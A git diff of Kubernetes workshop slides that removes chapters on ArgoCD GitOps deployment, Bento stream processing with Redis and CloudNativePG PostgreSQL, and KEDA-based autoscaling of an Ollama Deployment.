Note: `argocd admin dashboard` is similar to `kubectl port-forward` or `kubectl-proxy`.
|
||||
|
||||
(The dashboard remains available as long as `argocd admin dashboard` is running.)
|
||||
|
||||
---
|
||||
|
||||
## Adding a staging Application
|
||||
|
||||
- Let's add another Application for a staging environment
|
||||
|
||||
- First, create a new branch (e.g. `staging`) in our kubercoins fork
|
||||
|
||||
- Then, in the ArgoCD web UI, click on the "+ NEW APP" button
|
||||
|
||||
(on a narrow display, it might just be "+", right next to buttons looking like 🔄 and ↩️)
|
||||
|
||||
- See next slides for details about that form!
|
||||
|
||||
---
|
||||
|
||||
## Defining the Application
|
||||
|
||||
| Field | Value |
|
||||
|------------------|--------------------------------------------|
|
||||
| Application Name | `kubercoins-stg` |
|
||||
| Project Name | `default` |
|
||||
| Sync policy | `Manual` |
|
||||
| Sync options | check `auto-create namespace` |
|
||||
| Repository URL | `https://github.com/<username>/<reponame>` |
|
||||
| Revision | `<branchname>` |
|
||||
| Path | `.` |
|
||||
| Cluster URL | `https://kubernetes.default.svc` |
|
||||
| Namespace | `kubercoins-stg` |
|
||||
|
||||
Then click on the "CREATE" button (top left).
|
||||
|
||||
---
|
||||
|
||||
## Synchronizing the Application
|
||||
|
||||
- After creating the app, it should now show up in the app tiles
|
||||
|
||||
(with a yellow outline to indicate that it's out of sync)
|
||||
|
||||
- Click on the "SYNC" button on the app tile to show the sync panel
|
||||
|
||||
- In the sync panel, click on "SYNCHRONIZE"
|
||||
|
||||
- The app will start to synchronize, and should become healthy after a little while
|
||||
|
||||
---
|
||||
|
||||
## Making changes
|
||||
|
||||
- Let's make changes to our application manifests and see what happens
|
||||
|
||||
.lab[
|
||||
|
||||
- Make a change to a manifest
|
||||
|
||||
(for instance, change the number of replicas of a Deployment)
|
||||
|
||||
- Commit that change and push it to the staging branch
|
||||
|
||||
- Check the application sync status:
|
||||
```bash
|
||||
argocd app list
|
||||
```
|
||||
|
||||
]
|
||||
|
||||
- After a short period of time (a few minutes max) the app should show up "out of sync"
|
||||
|
||||
---
|
||||
|
||||
## Automated synchronization
|
||||
|
||||
- We don't want to manually sync after every change
|
||||
|
||||
(that wouldn't be true continuous deployment!)
|
||||
|
||||
- We're going to enable "auto sync"
|
||||
|
||||
- Note that this requires much more rigorous testing and observability!
|
||||
|
||||
(we need to be sure that our changes won't crash our app or even our cluster)
|
||||
|
||||
- Argo project also provides [Argo Rollouts][rollouts]
|
||||
|
||||
(a controller and CRDs to provide blue-green, canary deployments...)
|
||||
|
||||
- Today we'll just turn on automated sync for the staging namespace
|
||||
|
||||
---
|
||||
|
||||
## Enabling auto-sync
|
||||
|
||||
- In the web UI, go to *Applications* and click on *kubercoins-stg*
|
||||
|
||||
- Click on the "DETAILS" button (top left, might be just a "i" sign on narrow displays)
|
||||
|
||||
- Click on "ENABLE AUTO-SYNC" (under "SYNC POLICY")
|
||||
|
||||
- After a few minutes the changes should show up!
|
||||
|
||||
---
|
||||
|
||||
## Rolling back
|
||||
|
||||
- If we deploy a broken version, how do we recover?
|
||||
|
||||
- "The GitOps way": revert the changes in source control
|
||||
|
||||
(see next slide)
|
||||
|
||||
- Emergency rollback:
|
||||
|
||||
- disable auto-sync (if it was enabled)
|
||||
|
||||
- on the app page, click on "HISTORY AND ROLLBACK"
|
||||
<br/>
|
||||
(with the clock-with-backward-arrow icon)
|
||||
|
||||
- click on the "..." button next to the button we want to roll back to
|
||||
|
||||
- click "Rollback" and confirm
|
||||
|
||||
---
|
||||
|
||||
## Rolling back with GitOps
|
||||
|
||||
- The correct way to roll back is rolling back the code in source control
|
||||
|
||||
```bash
|
||||
git checkout staging
|
||||
git revert HEAD
|
||||
git push origin staging
|
||||
```
|
||||
|
||||
---
|
||||
|
||||
## Working with Helm
|
||||
|
||||
- ArgoCD supports different tools to process Kubernetes manifests:
|
||||
|
||||
Kustomize, Helm, Jsonnet, and [Config Management Plugins][cmp]
|
||||
|
||||
- Let's how to deploy Helm charts with ArgoCD!
|
||||
|
||||
- In the [kubercoins] repository, there is a branch called [helm-branch]
|
||||
|
||||
- It provides a generic Helm chart, in the [generic-service] directory
|
||||
|
||||
- There are service-specific values YAML files in the [values] directory
|
||||
|
||||
- Let's create one application for each of the 5 components of our app!
|
||||
|
||||
---
|
||||
|
||||
## Creating a Helm Application
|
||||
|
||||
- The example below uses "upstream" kubercoins
|
||||
|
||||
- Feel free to use your own fork instead!
|
||||
|
||||
.lab[
|
||||
|
||||
- Create an Application for `hasher`:
|
||||
```bash
|
||||
argocd app create hasher \
|
||||
--repo https://github.com/jpetazzo/kubercoins.git \
|
||||
--path generic-service --revision helm \
|
||||
--dest-server https://kubernetes.default.svc \
|
||||
--dest-namespace kubercoins-helm \
|
||||
--sync-option CreateNamespace=true \
|
||||
--values ../values/hasher.yaml \
|
||||
--sync-policy=auto
|
||||
```
|
||||
|
||||
]
|
||||
|
||||
---
|
||||
|
||||
## Deploying the rest of the application
|
||||
|
||||
- Option 1: repeat the previous command (updating app name and values)
|
||||
|
||||
- Option 2: author YAML manifests and apply them
|
||||
|
||||
---
|
||||
|
||||
## Additional considerations
|
||||
|
||||
- When running in production, ArgoCD can be integrated with an [SSO provider][sso]
|
||||
|
||||
- ArgoCD embeds and bundles [Dex] to delegate authentication
|
||||
|
||||
- it can also use an existing OIDC provider (Okta, Keycloak...)
|
||||
|
||||
- A single ArgoCD instance can manage multiple clusters
|
||||
|
||||
(but it's also fine to have one ArgoCD per cluster)
|
||||
|
||||
- ArgoCD can be complemented with [Argo Rollouts][rollouts] for advanced rollout control
|
||||
|
||||
(blue/green, canary...)
|
||||
|
||||
---
|
||||
|
||||
## Acknowledgements
|
||||
|
||||
Many thanks to
|
||||
Anton (Ant) Weiss ([antweiss.com](https://antweiss.com), [@antweiss](https://twitter.com/antweiss))
|
||||
and
|
||||
Guilhem Lettron
|
||||
for contributing an initial version and suggestions to this ArgoCD chapter.
|
||||
|
||||
All remaining typos, mistakes, or approximations are mine (Jérôme Petazzoni).
|
||||
|
||||
[argocd-binaries]: https://github.com/argoproj/argo-cd/releases/latest
|
||||
[argocd-helmchart]: https://artifacthub.io/packages/helm/argo/argocd-apps
|
||||
[argocd-packages]: https://argo-cd.readthedocs.io/en/stable/cli_installation/
|
||||
[cmp]: https://argo-cd.readthedocs.io/en/stable/operator-manual/config-management-plugins/
|
||||
[Dex]: https://github.com/dexidp/dex
|
||||
[generic-service]: https://github.com/jpetazzo/kubercoins/tree/helm/generic-service
|
||||
[helm-branch]: https://github.com/jpetazzo/kubercoins/tree/helm
|
||||
[issue14167]: https://github.com/argoproj/argo-cd/issues/14167
|
||||
[kubercoins]: https://github.com/jpetazzo/kubercoins
|
||||
[pollinginterval]: https://argo-cd.readthedocs.io/en/stable/faq/#how-often-does-argo-cd-check-for-changes-to-my-git-or-helm-repository
|
||||
[rollouts]: https://argoproj.github.io/rollouts/
|
||||
[sso]: https://argo-cd.readthedocs.io/en/stable/operator-manual/user-management/#sso
|
||||
[values]: https://github.com/jpetazzo/kubercoins/tree/helm/values
|
||||
|
||||
???
|
||||
|
||||
:EN:- Implementing gitops with ArgoCD
|
||||
:FR:- Workflow gitops avec ArgoCD
|
||||
@@ -856,7 +856,7 @@ class: extra-details
|
||||
- To learn more about Kubernetes attacks and threat models around RBAC:
|
||||
|
||||
📽️ [Hacking into Kubernetes Security for Beginners](https://www.youtube.com/watch?v=mLsCm9GVIQg)
|
||||
by [V Körbes](https://twitter.com/veekorbes)
|
||||
by [Ellen Körbes](https://twitter.com/ellenkorbes)
|
||||
and [Tabitha Sable](https://twitter.com/TabbySable)
|
||||
|
||||
---
|
||||
|
||||
@@ -1,173 +0,0 @@
|
||||
# Bento & PostgreSQL
|
||||
|
||||
- Bento can also use SQL databases for input/output
|
||||
|
||||
- We're going to demonstrate that by writing to a PostgreSQL database
|
||||
|
||||
- That database will be deployed with the Cloud Native PostGres operator
|
||||
|
||||
(https://cloudnative-pg.io/)
|
||||
|
||||
---
|
||||
|
||||
## CNPG in a nutshell
|
||||
|
||||
- Free, open source
|
||||
|
||||
- Originally created by [EDB] (EnterpriseDB, well-known PgSQL experts)
|
||||
|
||||
- Non-exhaustive list of features:
|
||||
|
||||
- provisioning of Postgres servers, replicas, bouncers
|
||||
|
||||
- automatic failover
|
||||
|
||||
- backups (full backups and WAL shipping)
|
||||
|
||||
- provisioning from scratch, from backups, PITR
|
||||
|
||||
- manual and automated switchover (e.g. for node maintenance)
|
||||
|
||||
- and many more!
|
||||
|
||||
[EDB]: https://www.enterprisedb.com/workload/kubernetes
|
||||
|
||||
---
|
||||
|
||||
## What we're going to do
|
||||
|
||||
1. Install CNPG.
|
||||
|
||||
2. Provision a Postgres cluster.
|
||||
|
||||
3. Configure Bento to write to that cluster.
|
||||
|
||||
4. Set up a Grafana dashboard to see the data.
|
||||
|
||||
---
|
||||
|
||||
## 1️⃣ Installing CNPG
|
||||
|
||||
Many options available, see the [documentation][cnpg-install]:
|
||||
|
||||
- raw YAML manifests
|
||||
|
||||
- kubectl CNPG plugin (`kubectl cnpg install generate`)
|
||||
|
||||
- Helm chart
|
||||
|
||||
- OLM
|
||||
|
||||
[cnpg-install]: https://cloudnative-pg.io/documentation/1.24/installation_upgrade/
|
||||
|
||||
---
|
||||
|
||||
## 2️⃣ Provisioning a Postgres cluster
|
||||
|
||||
Minimal manifest:
|
||||
|
||||
```yaml
|
||||
apiVersion: postgresql.cnpg.io/v1
|
||||
kind: Cluster
|
||||
metadata:
|
||||
name: db
|
||||
spec:
|
||||
storage:
|
||||
size: 1Gi
|
||||
```
|
||||
|
||||
---
|
||||
|
||||
class: extra-details
|
||||
|
||||
## For production...
|
||||
|
||||
We might also add:
|
||||
|
||||
- `spec.monitoring.enablePodMonitor: true`
|
||||
|
||||
- `spec.instances: 2`
|
||||
|
||||
- `resources.{requests,limits}.{cpu,memory}`
|
||||
|
||||
- `walStorage.size`
|
||||
|
||||
- `backup`
|
||||
|
||||
- `postgresql.parameters`
|
||||
|
||||
See [this manifest][cluster-maximal] for a detailed example.
|
||||
|
||||
[cluster-maximal]: https://github.com/jpetazzo/pozok/blob/main/cluster-maximal.yaml
|
||||
|
||||
---
|
||||
|
||||
## 3️⃣ Configuring Bento to write to SQL
|
||||
|
||||
- We'll use the [`sql_insert`][sql-insert] output
|
||||
|
||||
- If our cluster is named `mydb`, there will be a Secret `mydb-app`
|
||||
|
||||
- This Secret will contain a `uri` field
|
||||
|
||||
- That field can be used as the `dns` in the Bento configuration
|
||||
|
||||
- We will also need to create the table that we want to use
|
||||
|
||||
(see next slide for instructions)
|
||||
|
||||
[sql-insert]: https://warpstreamlabs.github.io/bento/docs/components/outputs/sql_insert
|
||||
|
||||
---
|
||||
|
||||
## Creating a table
|
||||
|
||||
- If we just want to store the city name and its population:
|
||||
```sql
|
||||
CREATE TABLE IF NOT EXISTS cities (
|
||||
city varchar(100) NOT NULL,
|
||||
population integer
|
||||
);
|
||||
```
|
||||
|
||||
- This statement can be executed:
|
||||
|
||||
- manually, by getting a `psql` shell with `kubectl cnpg psql mydb app`
|
||||
|
||||
- automatically, with Bento's `init_statatement`
|
||||
|
||||
---
|
||||
|
||||
## 4️⃣ Viewing the table in Grafana
|
||||
|
||||
- In Grafana, in the home menu on the lift, click "connections"
|
||||
|
||||
- Add a PostgreSQL data source
|
||||
|
||||
- Enter the host:port, database, user, password
|
||||
|
||||
- Then add a visualization using that data source
|
||||
|
||||
(it should be relatively self-explanatory!)
|
||||
|
||||
---
|
||||
|
||||
class: extra-details
|
||||
|
||||
## Automating it all
|
||||
|
||||
- Expose PostgreSQL credentials through environment variables
|
||||
|
||||
(in the Bento container)
|
||||
|
||||
- Use the `${...}` syntax in Bento to use these environment variables
|
||||
|
||||
- Export the Grafana dashboard to a JSON file
|
||||
|
||||
- Store the JSON file in a ConfigMap, with label `grafana_dashboard=1`
|
||||
|
||||
- Create that ConfigMap in the namespace where Grafana is running
|
||||
|
||||
- Similarly, data sources (like the Redis and the PostgreSQL one) can be defined in YAML
|
||||
|
||||
- And that YAML can be put in a ConfigMap with label `grafana_datasource=1`
|
||||
@@ -1,450 +0,0 @@
|
||||
# Autoscaling with KEDA
|
||||
|
||||
- Cluster autoscaling = automatically add nodes *when needed*
|
||||
|
||||
- *When needed* = when Pods are `Pending`
|
||||
|
||||
- How do these pods get created?
|
||||
|
||||
- When the Ollama Deployment is scaled up
|
||||
|
||||
- ... manually (e.g. `kubectl scale`)
|
||||
|
||||
- ... automatically (that's what we want to investigate now!)
|
||||
|
||||
---
|
||||
|
||||
## Ways to implement autoscaling
|
||||
|
||||
- Custom code
|
||||
|
||||
(e.g. crontab checking some value every few minutes and scaling accordingly)
|
||||
|
||||
- Kubernetes Horizontal Pod Autoscaler v1
|
||||
|
||||
(aka `kubectl autoscale`)
|
||||
|
||||
- Kubernetes Horizontal Pod Autoscaler v2 with custom metrics
|
||||
|
||||
(e.g. with Prometheus Adapter)
|
||||
|
||||
- Kubernetes Horizontal Pod Autoscaler v2 with external metrics
|
||||
|
||||
(e.g. with KEDA)
|
||||
|
||||
---
|
||||
|
||||
## Custom code
|
||||
|
||||
- No, we're not going to do that!
|
||||
|
||||
- But this would be an interesting exercise in RBAC
|
||||
|
||||
(setting minimal amount of permissions for the pod running our custom code)
|
||||
|
||||
---
|
||||
|
||||
## HPAv1
|
||||
|
||||
Pros: very straightforward
|
||||
|
||||
Cons: can only scale on CPU utilization
|
||||
|
||||
How it works:
|
||||
|
||||
- periodically measures average CPU *utilization* across pods
|
||||
|
||||
- if utilization is above/below a target (default: 80%), scale up/down
|
||||
|
||||
---
|
||||
|
||||
## HPAv1 in practice
|
||||
|
||||
- Create the autoscaling policy:
|
||||
```bash
|
||||
kubectl autoscale deployment ollama --max=1000
|
||||
```
|
||||
(The `--max` is required; it's a safety limit.)
|
||||
|
||||
- Check it:
|
||||
```bash
|
||||
kubectl describe hpa
|
||||
```
|
||||
|
||||
- Send traffic, wait a bit: pods should be created automatically
|
||||
|
||||
---
|
||||
|
||||
## HPAv2 custom vs external
|
||||
|
||||
- Custom metrics = arbitrary metrics attached to Kubernetes objects
|
||||
|
||||
- External metrics = arbitrary metrics not related to Kubernetes objects
|
||||
|
||||
--
|
||||
|
||||
🤔
|
||||
|
||||
---
|
||||
|
||||
## HPAv2 custom metrics
|
||||
|
||||
- Examples:
|
||||
|
||||
- on Pods: CPU, RAM, network traffic...
|
||||
|
||||
- on Ingress: requests per second, HTTP status codes, request duration...
|
||||
|
||||
- on some worker Deployment: number of tasks processed, task duration...
|
||||
|
||||
- Requires an *adapter* to:
|
||||
|
||||
- expose the metrics through the Kubernetes *aggregation layer*
|
||||
|
||||
- map the actual metrics source to Kubernetes objects
|
||||
|
||||
Example: the [Prometheus adapter][prometheus-adapter]
|
||||
|
||||
[prometheus-adapter]: https://github.com/kubernetes-sigs/prometheus-adapter
|
||||
|
||||
---
|
||||
|
||||
## HPAv2 custom metrics in practice
|
||||
|
||||
- We're not going to cover this here
|
||||
|
||||
(too complex / not enough time!)
|
||||
|
||||
- If you want more details, check [my other course material][hpav2slides]
|
||||
|
||||
[hpav2slides]: https://2024-10-enix.container.training/4.yml.html#toc-scaling-with-custom-metrics
|
||||
|
||||
---
|
||||
|
||||
## HPAv2 external metrics
|
||||
|
||||
- Examples:
|
||||
|
||||
- arbitrary Prometheus query
|
||||
|
||||
- arbitrary SQL query
|
||||
|
||||
- number of messages in a queue
|
||||
|
||||
- and [many, many more][keda-scalers]
|
||||
|
||||
- Also requires an extra components to expose the metrics
|
||||
|
||||
Example: [KEDA (https://keda.sh/)](https://keda.sh)
|
||||
|
||||
[keda-scalers]: https://keda.sh/docs/latest/scalers/
|
||||
|
||||
---
|
||||
|
||||
## HPAv2 external metrics in practice
|
||||
|
||||
- We're going to install KEDA
|
||||
|
||||
- And set it up to autoscale depending on the number of messages in Redis
|
||||
|
||||
---
|
||||
|
||||
## Installing KEDA
|
||||
|
||||
Multiple options (details in the [documentation][keda-deploy]):
|
||||
|
||||
- YAML
|
||||
|
||||
- Operator Hub
|
||||
|
||||
- Helm chart 💡
|
||||
|
||||
```bash
|
||||
helm upgrade --install --repo https://kedacore.github.io/charts \
|
||||
--namespace keda-system --create-namespace keda keda
|
||||
```
|
||||
|
||||
[keda-deploy]: https://keda.sh/docs/latest/deploy/
|
||||
|
||||
---
|
||||
|
||||
## Scaling according to Redis
|
||||
|
||||
- We need to create a KEDA Scaler
|
||||
|
||||
- This is done with a "ScaledObject" manifest
|
||||
|
||||
- [Here is the documentation][keda-redis-lists] for the Redis Lists Scaler
|
||||
|
||||
- Let's write that manifest!
|
||||
|
||||
[keda-redis-lists]: https://keda.sh/docs/latest/scalers/redis-lists/
|
||||
|
||||
---
|
||||
|
||||
## `keda-redis-scaler.yaml`
|
||||
|
||||
```yaml
|
||||
apiVersion: keda.sh/v1alpha1
|
||||
kind: ScaledObject
|
||||
metadata:
|
||||
name: ollama
|
||||
spec:
|
||||
scaleTargetRef:
|
||||
name: ollama
|
||||
triggers:
|
||||
- type: redis
|
||||
metadata:
|
||||
address: redis.`default`.svc:6379
|
||||
listName: cities
|
||||
listLength: "10"
|
||||
```
|
||||
|
||||
---
|
||||
|
||||
## Notes
|
||||
|
||||
- We need to update the `address` field with our namespace
|
||||
|
||||
(unless we are running in the `default` namespace)
|
||||
|
||||
- Alternative: use `addressFromEnv` and set an env var in the Ollama pods
|
||||
|
||||
- `listLength` gives the target ratio of `messages / replicas`
|
||||
|
||||
- In our example, KEDA will scale the Deployment to `messages / 100`
|
||||
|
||||
(rounded up!)
|
||||
|
||||
---
|
||||
|
||||
## Trying it out
|
||||
|
||||
- Apply the ScaledObject manifest
|
||||
|
||||
- Start a Bento pipeline loading e.g. 100-1000 cities in Redis
|
||||
|
||||
(100 on smaller clusters / slower CPUs, 1000 on bigger / faster ones)
|
||||
|
||||
- Check pod and nod resource usage
|
||||
|
||||
- What do we see?
|
||||
|
||||
--
|
||||
|
||||
🤩 The Deployment scaled up automatically!
|
||||
|
||||
--
|
||||
|
||||
🤔 But Pod resource usage remains very low (A few busy pods, many idle)
|
||||
|
||||
--
|
||||
|
||||
💡 Bento doesn't submit enough requests in parallel!
|
||||
|
||||
---
|
||||
|
||||
## Improving throughput
|
||||
|
||||
We're going to review multiple techniques:
|
||||
|
||||
1. Increase parallelism inside the Bento pipeline.
|
||||
|
||||
2. Run multiple Bento consumers.
|
||||
|
||||
3. Couple consumers and processors more tightly.
|
||||
|
||||
---
|
||||
|
||||
## 1️⃣ Increase pipeline parallelism
|
||||
|
||||
- Set `parallel` to `true` in the `http` processor
|
||||
|
||||
- Wrap the input around a `batched` input
|
||||
|
||||
(otherwise, we don't have enough messages in flight)
|
||||
|
||||
- Increase `http` timeout significantly (e.g. to 5 minutes)
|
||||
|
||||
---
|
||||
|
||||
## Results
|
||||
|
||||
🎉 More messages flow through the pipeline
|
||||
|
||||
🎉 Many requests happen in parallel
|
||||
|
||||
🤔 Average Pod and Node CPU utilization is higher, but not maxed out
|
||||
|
||||
🤔 HTTP queue size (measured with HAProxy metrics) is relatively high
|
||||
|
||||
🤔 Latency is higher too
|
||||
|
||||
Why?
|
||||
|
||||
---
|
||||
|
||||
## Too many requests in parallel
|
||||
|
||||
- Ealier, we didn't have enough...
|
||||
|
||||
- ...Now, we have too much!
|
||||
|
||||
- However, for a very big request queue, it still wouldn't be enough
|
||||
|
||||
💡 We currently have a fixed parallelism. We need to make it dynamic!
|
||||
|
||||
---
|
||||
|
||||
## 2️⃣ Run multiple Bento consumers
|
||||
|
||||
- Restore the original Bento configuration
|
||||
|
||||
(flip `parallel` back to `false`; remove the `batched` input)
|
||||
|
||||
- Run Bento in a Deployment
|
||||
|
||||
(e.g. with the [Bento Helm chart][bento-helm-chart])
|
||||
|
||||
- Autoscale that Deployment like we autoscaled the Ollama Deployment
|
||||
|
||||
[bento-helm-chart]: https://github.com/warpstreamlabs/bento-helm-chart
|
||||
|
||||
---
|
||||
|
||||
## Results
|
||||
|
||||
🤔🤔🤔 Pretty much the same as before!
|
||||
|
||||
(High throughput, high utilization but not maxed out, high latency...)
|
||||
|
||||
--
|
||||
|
||||
🤔🤔🤔 Why?
|
||||
|
||||
---
|
||||
|
||||
## Unbalanced load balancing
|
||||
|
||||
- All our requests go through the `ollama` Service
|
||||
|
||||
- We're still using the default Kubernetes service proxy!
|
||||
|
||||
- It doesn't spread the requests properly across all the backends
|
||||
|
||||
---
|
||||
|
||||
## 3️⃣ Couple consumers and processors
|
||||
|
||||
What if:
|
||||
|
||||
--
|
||||
|
||||
instead of sending requests to a load balancer,
|
||||
|
||||
--
|
||||
|
||||
each queue consumer had its own Ollama instance?
|
||||
|
||||
---
|
||||
|
||||
## Current architecture
|
||||
|
||||
<pre class="mermaid">
|
||||
flowchart LR
|
||||
subgraph P1["Pod"]
|
||||
H1["HAProxy"] --> O1["Ollama"]
|
||||
end
|
||||
subgraph P2["Pod"]
|
||||
H2["HAProxy"] --> O2["Ollama"]
|
||||
end
|
||||
subgraph P3["Pod"]
|
||||
H3["HAProxy"] --> O3["Ollama"]
|
||||
end
|
||||
Q["Queue<br/>(Redis)"] <--> C["Consumer<br/>(Bento)"] --> LB["Load Balancer<br/>(kube-proxy)"]
|
||||
LB --> H1 & H2 & H3
|
||||
</pre>
|
||||
|
||||
---
|
||||
|
||||
## Proposed architecture
|
||||
|
||||
<pre class="mermaid">
|
||||
flowchart LR
|
||||
subgraph P1["Consumer Pod"]
|
||||
C1["Bento"] --> H1["HAProxy"] --> O1["Ollama"]
|
||||
end
|
||||
subgraph P2["Consumer Pod"]
|
||||
C2["Bento"] --> H2["HAProxy"] --> O2["Ollama"]
|
||||
end
|
||||
subgraph P3["Consumer Pod"]
|
||||
C3["Bento"] --> H3["HAProxy"] --> O3["Ollama"]
|
||||
end
|
||||
Queue["Queue"] <--> C1 & C2 & C3
|
||||
</pre>
|
||||
|
||||
---
|
||||
|
||||
## 🏗️ Let's build something!
|
||||
|
||||
- Let's implement that architecture!
|
||||
|
||||
- See next slides for hints / getting started
|
||||
|
||||
---
|
||||
|
||||
## Hints
|
||||
|
||||
We need to:
|
||||
|
||||
- Update the Bento consumer configuration to talk to localhost
|
||||
|
||||
- Store that configuration in a ConfigMap
|
||||
|
||||
- Add a Bento container to the Ollama Deployment
|
||||
|
||||
- Profit!
|
||||
|
||||
---
|
||||
|
||||
## Results
|
||||
|
||||
🎉 Node and Pod utilization is maximized
|
||||
|
||||
🎉 HTTP queue size is bounded
|
||||
|
||||
🎉 Deployment autoscales up and down
|
||||
|
||||
---
|
||||
|
||||
## ⚠️ Scaling down
|
||||
|
||||
- Eventually, there are less messages in the queue
|
||||
|
||||
- The HPA scales down the Ollama Deployment
|
||||
|
||||
- This terminates some Ollama Pods
|
||||
|
||||
🤔 What happens if these Pods were processing requests?
|
||||
|
||||
--
|
||||
|
||||
- The requests might be lost!
|
||||
|
||||
---
|
||||
|
||||
## Avoiding lost messages
|
||||
|
||||
Option 1:
|
||||
|
||||
- cleanly shutdown the consumer
|
||||
|
||||
- make sure that Ollama can complete in-flight requests
|
||||
|
||||
(by extending its grace period)
|
||||
|
||||
- find a way to terminate Ollama when no more requests are in flight
|
||||
|
||||
Option 2:
|
||||
|
||||
- use *message acknowledgement*
|
||||
@@ -1,623 +0,0 @@
|
||||
# Getting started with Bento
|
||||
|
||||
How can we move to a message queue architecture...
|
||||
|
||||
*...without rewriting a bunch of code?*
|
||||
|
||||
🤔
|
||||
|
||||
---
|
||||
|
||||
## Bento
|
||||
|
||||
https://bento.dev/
|
||||
|
||||
"Fancy stream processing made operationally mundane"
|
||||
|
||||
"Written in Go, deployed as a static binary, declarative configuration. Open source and cloud native as utter heck."
|
||||
|
||||
With ✨ amazing ✨ documentation 😍
|
||||
|
||||
---
|
||||
|
||||
class: extra-details
|
||||
|
||||
## Tiny bit of history
|
||||
|
||||
- Original project: Benthos
|
||||
|
||||
- May 30, 2024: [Redpanda acquires Benthos][redpanda-acquires-benthos]
|
||||
|
||||
- Benthos is now Redpanda Connect
|
||||
|
||||
- some parts have been relicensed as commercial products
|
||||
|
||||
- May 31, 2024: [Warpstream forks Benthos][warpstream-forks-benthos]
|
||||
|
||||
- that fork is named "Bento"
|
||||
|
||||
- it's fully open source
|
||||
|
||||
- We're going to use Bento here, but Redpanda Connect should work fine too!
|
||||
|
||||
---
|
||||
|
||||
## Bento concepts
|
||||
|
||||
- Message stream processor
|
||||
|
||||
- Each pipeline is configured by a YAML configuration that defines:
|
||||
|
||||
- input (where do we get the messages?)
|
||||
|
||||
- pipeline (optional: how do we transform the messages?)
|
||||
|
||||
- output (where do we put the messages afterwards?)
|
||||
|
||||
- Once Bento is started, it runs the pipelines forever
|
||||
|
||||
(except for pipelines that have a logical end, e.g. reading from a file)
|
||||
|
||||
- Embedded language (Bloblang) to manipulate/transform messages
|
||||
|
||||
---
|
||||
|
||||
## Messages
|
||||
|
||||
- Typically JSON objects
|
||||
|
||||
(but raw strings are also possible)
|
||||
|
||||
- Nesting, arrays, etc. are OK
|
||||
|
||||
---
|
||||
|
||||
## Getting started with Bento
|
||||
|
||||
We're going to:
|
||||
|
||||
1. Import a bunch of cities from a CSV file into a Redis queue.
|
||||
|
||||
2. Read back these cities using a web server.
|
||||
|
||||
3. Use an "enrichment workflow" to query our LLM for each city.
|
||||
|
||||
---
|
||||
|
||||
## 1️⃣ Importing cities
|
||||
|
||||
Let's break down the work:
|
||||
|
||||
- download the data set
|
||||
|
||||
- create the Bento configuration
|
||||
|
||||
- deploy Redis
|
||||
|
||||
- start Bento
|
||||
|
||||
---
|
||||
|
||||
## Downloading the data set
|
||||
|
||||
- Example database:
|
||||
|
||||
https://www.kaggle.com/datasets/juanmah/world-cities
|
||||
|
||||
- Let's download and uncompress the data set:
|
||||
```bash
|
||||
curl -fsSL https://www.kaggle.com/api/v1/datasets/download/juanmah/world-cities |
|
||||
funzip > cities.csv
|
||||
```
|
||||
|
||||
(Ignore the "length error", it's harmless!)
|
||||
|
||||
- Check the structure of the data set:
|
||||
```bash
|
||||
head cities.csv
|
||||
```
|
||||
|
||||
---
|
||||
|
||||
## Creating the Bento configuration
|
||||
|
||||
- We need to find which `input` and `output` to use
|
||||
|
||||
- Check the list with `bento list` or the [documentation][bento-inputs]
|
||||
|
||||
- Then run `bento create INPUTNAME/PIPELINENAME/OUTPUTNAME`
|
||||
|
||||
- Generate a configuration file:
|
||||
```bash
|
||||
bento create csv//redis_list > csv2redis.yaml
|
||||
```
|
||||
|
||||
- Edit that configuration file; look for the `(required)` parameters
|
||||
|
||||
(Everything else can go away!)
|
||||
|
||||
---
|
||||
|
||||
## Resulting configuration
|
||||
|
||||
If we trim all the default values, here is the result:
|
||||
|
||||
```yaml
|
||||
input:
|
||||
csv:
|
||||
paths: ["cities.csv"]
|
||||
output:
|
||||
redis_list:
|
||||
url: redis://redis:6379 # No default (required)
|
||||
key: cities
|
||||
```
|
||||
|
||||
We'll call that value `csv2redis.yaml`.
|
||||
|
||||
---
|
||||
|
||||
## Deploying Redis
|
||||
|
||||
- Create a Deployment:
|
||||
```bash
|
||||
kubectl create deployment redis --image redis
|
||||
```
|
||||
|
||||
- Expose it:
|
||||
```bash
|
||||
kubectl expose deployment redis --port 6379
|
||||
```
|
||||
|
||||
---
|
||||
|
||||
## Starting Bento
|
||||
|
||||
Option 1: run it manually in a pod, to see what's going on.
|
||||
|
||||
```bash
|
||||
bento --config csv2redis.yaml
|
||||
```
|
||||
|
||||
Option 2: run it with e.g. the Bento Helm chart.
|
||||
|
||||
*We're not going to do that yet, since this particular pipeline has a logical end.*
|
||||
|
||||
*(The Helm chart is best suited to pipelines that run forever.)*
|
||||
|
||||
---
|
||||
|
||||
## Expected output
|
||||
|
||||
.small[
|
||||
```
|
||||
INFO Running main config from specified file @service=bento bento_version="" path=csv2redis.yaml
|
||||
INFO Launching a Bento instance, use CTRL+C to close @service=bento
|
||||
INFO Listening for HTTP requests at: http://0.0.0.0:4195 @service=bento
|
||||
INFO Input type csv is now active @service=bento label="" path=root.input
|
||||
INFO Output type redis_list is now active @service=bento label="" path=root.output
|
||||
INFO Pipeline has terminated. Shutting down the service @service=bento
|
||||
```
|
||||
]
|
||||
|
||||
The pipeline should complete in just a few seconds.
|
||||
|
||||
---
|
||||
|
||||
## Checking what's in Redis
|
||||
|
||||
- Connect to our Redis instance:
|
||||
```bash
|
||||
redis-cli -h redis
|
||||
```
|
||||
|
||||
- List keys:
|
||||
```redis
|
||||
KEYS *
|
||||
```
|
||||
|
||||
- Check that the `cities` list has approx. 47000 elements:
|
||||
```redis
|
||||
LLEN cities
|
||||
```
|
||||
|
||||
- Get the first element of the list:
|
||||
```redis
|
||||
LINDEX cities 0
|
||||
```
|
||||
|
||||
---
|
||||
|
||||
## Fun with Bloblang
|
||||
|
||||
- Let's add a filter to keep only cities with a population above 10,000,000
|
||||
|
||||
- Add the following block to the Bento configuration:
|
||||
|
||||
```yaml
|
||||
pipeline:
|
||||
processors:
|
||||
- switch:
|
||||
- check: this.population == ""
|
||||
processors:
|
||||
- mapping: root = deleted()
|
||||
- check: this.population.int64() < 10000000
|
||||
processors:
|
||||
- mapping: root = deleted()
|
||||
```
|
||||
|
||||
(See the [docs][bento-switch] for details about the `switch` processor.)
|
||||
|
||||
---
|
||||
|
||||
## Testing our processor
|
||||
|
||||
- First, delete the existing `cities` list:
|
||||
```bash
|
||||
redis-cli -h redis DEL cities
|
||||
```
|
||||
|
||||
- Then, run the Bento pipeline again:
|
||||
```bash
|
||||
bento --config csv2redis.yaml
|
||||
```
|
||||
(It should complain about a few cities where the population has a decimal point.)
|
||||
|
||||
- Check how many cities were loaded:
|
||||
```bash
|
||||
